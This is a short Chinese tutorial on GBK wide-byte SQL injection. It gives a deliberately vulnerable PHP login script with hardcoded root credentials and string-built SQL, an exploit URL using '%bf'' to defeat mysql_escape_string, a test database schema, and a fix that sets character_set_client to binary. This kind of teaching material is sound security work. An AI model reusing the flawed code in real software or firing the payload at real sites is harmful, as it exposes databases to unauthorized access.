宽字节注入实例

<?php

 

02/*

 

03 * code:c4bbage

 

04 * From:cunlide.com

 

05 */

 

06error_reporting(E_ALL);

 

07$conn = mysql_connect("localhost","root","toor");

 

08mysql_query("SET NAMES 'GBK'");

 

09mysql_select_db("test1",$conn);

 

10$username=mysql_escape_string($_GET['username']);

 

11//$username= addslashes($_GET['username']);

 

12var_dump($username);

 

13$password=mysql_escape_string($_GET['password']);

 

14$sql= "select * from admin where username='$username' and password='$password'";

 

15print_r($sql);echo "<br>";

 

16$result = mysql_query($sql,$conn);

 

17print_r($result);echo "<br>";

 

18while ($row=mysql_fetch_array($result,MYSQL_ASSOC))

 

19{

 

20    print_r($row[]=$row);

 

21}

www.2cto.com

22/*

 

23exp:

 

24http://127.0.0.1/sqli.php?username=%bf'union select 1,2,3%23&password=password

 

25db file :

 

26--test1.sql

 

27SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";

 

28SET time_zone = "+00:00";

 

29--gbk database

 

30CREATE DATABASE `test1` DEFAULT CHARACTER SET gbk COLLATE gbk_chinese_ci;

 

31USE `test1`;

 

32

 

33CREATE TABLE IF NOT EXISTS `admin` (

 

34  `id` int(11) NOT NULL,

 

35  `username` varchar(15) NOT NULL,

 

36  `password` varchar(15) NOT NULL,

 

37  PRIMARY KEY (`id`)

 

38) ENGINE=InnoDB DEFAULT CHARSET=gbk;

 

39

 

40INSERT INTO `admin` (`id`, `username`, `password`) VALUES

 

41(1, 'admin', 'password');

 

42

 

43*/

 

44?>

   解决方法:就是在初始化连接和字符集之后，使用SET character_set_client=binary来设定客户端的字符集是二进制的。修改Windows下的MySQL配置文件一般是 my.ini，Linux下的MySQL配置文件一般是my.cnf，比如：mysql_query("SET character_set_client=binary");。character_set_client指定的是SQL语句的编码，如果设置为 binary，MySQL就以二进制来执行，这样宽字节编码问题就没有用武之地了